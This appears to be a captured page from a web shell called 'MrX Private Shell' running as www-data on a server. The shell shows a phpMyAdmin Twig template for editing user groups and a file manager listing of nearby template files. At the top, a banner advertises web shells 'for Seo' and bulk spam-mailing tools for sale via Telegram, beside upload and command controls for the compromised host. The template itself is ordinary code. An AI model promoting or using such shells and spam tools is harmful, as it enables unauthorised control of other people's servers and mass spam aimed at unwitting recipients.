__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
{% if user_group == null %}
    <h2>{% trans 'Add user group' %}</h2>
{% else %}
    <h2>{{ 'Edit user group: \'%s\''|trans|format(edit_user_group_special_chars) }}</h2>
{% endif %}
<form name="userGroupForm" id="userGroupForm" action="{{ user_group_url|raw }}" method="post">
    {{ hidden_inputs|raw }}
    <fieldset class="pma-fieldset" id="fieldset_user_group_rights">
        <legend>{% trans 'User group menu assignments' %} &nbsp;&nbsp;&nbsp;
            <input type="checkbox" id="addUsersForm_checkall" class="checkall_box" title="Check all">
            <label for="addUsersForm_checkall">{% trans 'Check all' %}</label>
        </legend>
        {% if user_group == null %}
            <label for="userGroup">{% trans 'Group name:' %}</label>
            <input type="text" name="userGroup" maxlength="64" autocomplete="off" required="required">
            <div class="clearfloat"></div>
        {% endif %}
        {{ tab_list|raw }}
    </fieldset>
    <fieldset id="fieldset_user_group_rights_footer" class="pma-fieldset tblFooters">
        <input class="btn btn-primary" type="submit" value="{% trans 'Go' %}">
    </fieldset>
</form>

Filemanager

Name Type Size Permission Actions
edit_user_groups.twig File 1.13 KB 0644
tab_list.twig File 457 B 0644
user_groups.twig File 3.07 KB 0644
user_listings.twig File 541 B 0644
Filemanager